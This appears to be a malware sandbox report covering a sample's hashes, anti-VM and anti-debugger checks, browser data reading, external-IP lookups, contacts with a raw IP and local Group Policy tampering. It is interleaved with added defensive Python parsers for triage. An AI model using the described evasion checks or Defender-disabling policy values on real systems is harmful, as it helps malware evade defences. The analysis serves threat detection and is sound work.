| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\VSO Inspector\is-SJ36R.tmp
| MD5 | 7c4c4a4d5684e8aacdc6b118a601a7bb |
| SHA1 | 64c8cc24339d73909916e303ab08a253dd49fe3f |
| SHA256 | d20e213ef79f5f58cf6ca45812648e21612af6b82f52eeee044ea050ab32d75e |
| SHA512 | db34326a59c7e5e809de1da9c98d5464d753dd554e9c8dddc32f164bfe9d637a5d5c6ae093905b8ca075b6801fd0d53e34e6400c7f9e1d553e33618a9baadeea |
C:\Users\Admin\AppData\Local\VSO Inspector\is-9PEDE.tmp
| MD5 | 9652fd87be092d9a50ef0156e00f8f8e |
| SHA1 | 006ab84afbd111eb8771276120a784c7a935e6c3 |
| SHA256 | 456c82b7f6e36fe13fdd385579049c426b2fa1307b0180aa0496ca75d522324c |
| SHA512 | 5d7b963b0929c00a64a83c2ff235cafa4a98b45082d48ed2d0cf94cb4cd09fdfd0e94deae31ef85ed48bbf7660a39da71f97ed9124233bf448a2b2a76ea5c5d6 |
C:\Users\Admin\AppData\Local\Temp\305.exe
| MD5 | 1996a23c7c764a77ccacf5808fec23b0 |
| SHA1 | 5a7141b167056bf8f01c067ebe12ed4ccc608dc7 |
| SHA256 | e40c8e14e8cb8a0667026a35e6e281c7a8a02bdf7bc39b53cfe0605e29372888 |
| SHA512 | 430c8b43c2cbb937d2528fa79c754be1a1b80c95c45c49dba323e3fe6097a7505fc437ddafab54b21d00fba9300b5fa36555535a6fa2eb656b5aa45ccf942e23 |
C:\ProgramData\EditPush.txt
| MD5 | a80739e8d257b131e2fb990d3a09bf4e |
| SHA1 | 3f2452672c160bb3eccfba3d612cfe95cfc64212 |
| SHA256 | b4449d67334535ca485a0245a341d6b9ce3315974bae7f6628aeaa78e14e4583 |
| SHA512 | 9018a7e7dda66e4f59f42b7f260bd35a2f2165500abaff3cf2c99a40740c2ac4999b401aa1514a34d8dcaf91fa146f57d2de6342cc5036700544513e06a7ad63 |
C:\ProgramData\UndoSync.docx
| MD5 | 2f04bfc62820734c1465af727c3f81d8 |
| SHA1 | b1de4ecafb64e259a0170f7ff418811629f08def |
| SHA256 | d19f86b2d8656cf474f844476822ce8059ec41f29e7c6c9fa0fdb8ef1f7fe84b |
| SHA512 | eddb3fbf823af8de9959090ebeaeb6d309d244ad494c71c9a9c657accdb6f96abcea1529689e79f8dfad0d755f9c62346f914f92cdd0c62ec363ce49d8ad549e |
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
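The Files listing above is the raw drop inventory, and it mixes three things an analyst wants kept apart: hashed files, memory-dump regions that carry no hash, and the same path listed more than once with different digests (the CryptnetUrlCache MetaData entry 94308059B57B3142E455B38A6EB92015 appears with two SHA256 values because the file was rewritten during the run). The script below is an added example, not part of the sandbox report: it parses this layout into records, surfaces rewritten paths, and reduces the inventory to the executable and script hashes worth blocking. The sample input is constructed from entries on this page; the extension list used to pick hunt-worthy files is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample in the report's own "Files" layout: a path line followed by
# | ALGO | hex | rows, with memory-dump lines interleaved. Values are copied from
# entries on this page; the CryptnetUrlCache path is listed twice with two
# different SHA256 digests, exactly as it is in the report.
SAMPLE_FILES = r"""
memory/1872-1431-0x0000000000990000-0x0000000000991000-memory.dmp
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| SHA256 | 9e8588c5897282c21c172b23b717b3f2bb705d24552d167cc9dffa2615a839ea |
memory/2220-1436-0x0000000002F25000-0x0000000002F3D000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| SHA256 | 2b620be240c3c5f0a3fa8762352975392be2a83f3e08e63a55ad41775cb0bade |
"""

HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Assumption: the dropped-file types worth pushing to EDR/blocklists.
HUNT_EXTS = (".exe", ".dll", ".bat", ".cmd", ".ps1", ".vbs", ".js")


def parse_files_section(text):
    """Turn the Files listing into [{"path": ..., "hashes": {ALGO: hex}}].

    A path line opens a record and the hash rows under it belong to that
    record; memory/... lines are dump regions, carry no digest and are
    dropped. A hash row whose hex length does not fit its algorithm is
    rejected rather than silently becoming a bogus indicator."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            algo, digest = m.group(1), m.group(2).lower()
            if current is None or len(digest) != HASH_LEN[algo]:
                raise ValueError(f"malformed hash row: {line}")
            current["hashes"][algo] = digest
        elif line.startswith("memory/"):
            current = None
        else:
            current = {"path": line, "hashes": {}}
            records.append(current)
    return records


def overwritten_paths(records):
    """Paths listed more than once with different SHA256 values: the file was
    rewritten during the run, and every version is its own indicator."""
    seen = defaultdict(set)
    for r in records:
        if "SHA256" in r["hashes"]:
            seen[r["path"]].add(r["hashes"]["SHA256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


def hunt_sha256s(records):
    """Sorted SHA256 set for dropped executables and scripts; cache files,
    icons and browser state only add noise to a blocklist."""
    return sorted({r["hashes"]["SHA256"] for r in records
                   if "SHA256" in r["hashes"]
                   and r["path"].lower().endswith(HUNT_EXTS)})


if __name__ == "__main__":
    recs = parse_files_section(SAMPLE_FILES)
    for path, digests in overwritten_paths(recs).items():
        print(f"rewritten during run: {path} ({len(digests)} versions)")
    print("\n".join(hunt_sha256s(recs)))
```

Run it over the whole Files section of a report and the rewritten-path check is the part that pays off: a staging file that changed contents between two reads is two indicators, not one, and a dedup on path alone would drop one of them.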
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
141s
Max time network
157s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3054445511-921769590-4013668107-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Reads user/profile data of web browsers
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
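setup.exe creating C:\Windows\System32\GroupPolicy\Machine\Registry.pol and touching gpt.ini is local Group Policy tampering: Registry.pol is the store the Group Policy client applies as machine policy, and the version in gpt.ini is what makes the client notice the change at the next refresh. The report records only the hash of the dropped file, not what it set, so decoding that file is the next step. The parser below is an added example, not sandbox or sample code; it implements the MS-GPREG layout (a "PReg" header and version, then [key;value;type;size;data] entries with UTF-16LE strings and delimiters). The sample policy content is constructed and hypothetical, since the page does not say what this Registry.pol contained, and the watchlist of Windows Defender policy names is an assumption to extend.

```python
import struct

REG_TYPES = {1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY", 4: "REG_DWORD", 7: "REG_MULTI_SZ"}

# Policy values a setup.exe from %TEMP% has no business writing. These are real
# Windows Defender policy names; treating them as a watchlist is an assumption.
WATCHLIST = {
    ("software\\policies\\microsoft\\windows defender", "disableantispyware"),
    ("software\\policies\\microsoft\\windows defender\\real-time protection",
     "disablerealtimemonitoring"),
}


def build_registry_pol(entries):
    """Serialise (key, value_name, reg_type, data_bytes) tuples as Registry.pol.

    Only used here to construct the sample. Layout per MS-GPREG: "PReg" + version 1,
    then [key;value;type;size;data] per entry, where the brackets/semicolons and
    both null-terminated strings are UTF-16LE and type/size are little-endian DWORDs."""
    out = bytearray(b"PReg" + struct.pack("<I", 1))
    for key, value, vtype, data in entries:
        out += b"[\x00"
        out += key.encode("utf-16-le") + b"\x00\x00" + b";\x00"
        out += value.encode("utf-16-le") + b"\x00\x00" + b";\x00"
        out += struct.pack("<I", vtype) + b";\x00"
        out += struct.pack("<I", len(data)) + b";\x00"
        out += data + b"]\x00"
    return bytes(out)


def _wstr(buf, pos):
    """Read a null-terminated UTF-16LE string at pos; return (text, next offset)."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(buf):
            raise ValueError("unterminated string in Registry.pol")
    return buf[pos:end].decode("utf-16-le"), end + 2


def _expect(buf, pos, token):
    if buf[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _decode(vtype, data):
    if vtype == 4 and len(data) == 4:
        return struct.unpack("<I", data)[0]
    if vtype in (1, 2):
        return data.decode("utf-16-le").rstrip("\x00")
    if vtype == 7:
        return [s for s in data.decode("utf-16-le").split("\x00") if s]
    return data.hex()


def parse_registry_pol(buf):
    """Return [(key, value_name, type_name, decoded_data)] from Registry.pol bytes,
    refusing files without the PReg v1 header and entries with truncated data."""
    if buf[:4] != b"PReg" or struct.unpack_from("<I", buf, 4)[0] != 1:
        raise ValueError("not a Registry.pol (PReg v1) file")
    pos, entries = 8, []
    while pos < len(buf):
        pos = _expect(buf, pos, b"[\x00")
        key, pos = _wstr(buf, pos)
        pos = _expect(buf, pos, b";\x00")
        value, pos = _wstr(buf, pos)
        pos = _expect(buf, pos, b";\x00")
        vtype = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, b";\x00")
        size = struct.unpack_from("<I", buf, pos)[0]
        pos = _expect(buf, pos + 4, b";\x00")
        data = buf[pos:pos + size]
        if len(data) != size:
            raise ValueError("truncated data field")
        pos = _expect(buf, pos + size, b"]\x00")
        entries.append((key, value, REG_TYPES.get(vtype, f"type{vtype}"), _decode(vtype, data)))
    return entries


def suspicious_policies(entries):
    """Entries whose (key, value name) pair is on the watchlist."""
    return [(k, v, d) for k, v, _, d in entries if (k.lower(), v.lower()) in WATCHLIST]


# Constructed, hypothetical content: the report gives only the hash of the dropped
# Registry.pol, not what it set. Two Defender policy values plus one benign policy.
SAMPLE_POL = build_registry_pol([
    ("Software\\Policies\\Microsoft\\Windows Defender", "DisableAntiSpyware", 4, struct.pack("<I", 1)),
    ("Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
     "DisableRealtimeMonitoring", 4, struct.pack("<I", 1)),
    ("Software\\Policies\\Microsoft\\Windows\\WindowsUpdate", "WUServer", 1,
     "http://wsus.example.local".encode("utf-16-le") + b"\x00\x00"),
])

if __name__ == "__main__":
    for key, name, data in suspicious_policies(parse_registry_pol(SAMPLE_POL)):
        print(f"policy tamper: {key}\\{name} = {data}")
```

Point parse_registry_pol at the real dropped file (read it in binary mode) and compare the decoded entries against the machine's policy baseline; on a host that is not domain-joined, anything in that file is the only policy there is, which is exactly why a dropper writes it.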
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
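Read as a whole, the network table shows one pattern: PTR lookups through 8.8.8.8, two external-IP lookup services, and repeated plain-HTTP sessions to 195.20.16.45 for which no hostname was ever resolved (the Domain column just repeats the IP). The script below is an added example, not part of the report: it parses rows in this layout, tolerating the misaligned form the sandbox can emit for the mDNS row (protocol shifted into the Domain column), buckets each connection, and counts hits per hard-coded endpoint so the raw-IP HTTP host stands out for blocking and pivoting. The rows are copied from the table above; the service list and bucket names are assumptions.

```python
import re
from collections import Counter

# Services the "Looks up external IP address" signature fired on in this run.
IP_LOOKUP_SERVICES = {"api.myip.com", "ipinfo.io"}
ROW = re.compile(r"^\|(.*)\|$")

# Constructed sample: rows copied from the behavioral14 network table, including
# the mDNS row in its misaligned form (no Domain cell, protocol shifted left).
SAMPLE_ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.177.190.20.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
"""


def parse_row(line):
    """Split one | Country | Destination | Domain | Proto | row.

    Returns None for the header and for anything that is not a four-cell row.
    A row whose last cell is empty and whose Domain cell holds 'tcp'/'udp' is
    the dropped-Domain case; the protocol is shifted back into its column."""
    m = ROW.match(line.strip())
    if not m:
        return None
    cells = [c.strip() for c in m.group(1).split("|")]
    if len(cells) != 4 or cells[0] == "Country":
        return None
    country, dest, domain, proto = cells
    if proto == "" and domain in ("tcp", "udp"):
        domain, proto = "", domain
    host, _, port = dest.rpartition(":")
    return {"country": country, "host": host or dest,
            "port": int(port) if port.isdigit() else 0,
            "domain": domain, "proto": proto}


def classify(row):
    """Bucket a connection by what it tells an analyst."""
    d = row["domain"]
    if d.endswith(".in-addr.arpa"):
        return "ptr_lookup"            # reverse lookups, usually OS/sandbox noise
    if d in IP_LOOKUP_SERVICES:
        return "external_ip_lookup"    # victim geolocation before the next stage
    if row["port"] == 5353 and row["host"].startswith("224.0.0."):
        return "mdns"                  # link-local multicast, not sample traffic
    if d in ("", "N/A") or d == row["host"]:
        return "direct_ip"             # never resolved: a hard-coded endpoint
    return "other"


def triage(text):
    """Summarise a network table: bucket counts plus each hard-coded endpoint
    and how often it was hit (repeat hits to one IP on :80 look like polling)."""
    rows = [r for r in (parse_row(l) for l in text.splitlines()) if r]
    kinds = Counter(classify(r) for r in rows)
    direct = Counter(f'{r["host"]}:{r["port"]}/{r["proto"]}'
                     for r in rows if classify(r) == "direct_ip")
    return {"kinds": dict(kinds), "direct_ip_endpoints": dict(direct)}


if __name__ == "__main__":
    print(triage(SAMPLE_ROWS))
```

The "direct_ip" bucket is the one to act on: an endpoint the sample reached with no DNS resolution is embedded in the binary or its config, so a block on that IP, and a hunt for it in proxy and firewall logs, survives any domain rotation the operators do later.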
Files
memory/2176-0-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-1-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-2-0x00007FFD80000000-0x00007FFD80002000-memory.dmp
memory/2176-3-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-4-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-5-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-7-0x00007FFD80030000-0x00007FFD80031000-memory.dmp
memory/2176-6-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
memory/2176-8-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-9-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-10-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-11-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-12-0x0000000140000000-0x0000000140C54000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/2176-20-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-21-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-22-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-23-0x00007FFD80000000-0x00007FFD80002000-memory.dmp
memory/2176-24-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-25-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-26-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
memory/2176-27-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-28-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-29-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-30-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-31-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-32-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-33-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-34-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-35-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-36-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-37-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-38-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-39-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
115s
Max time network
168s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
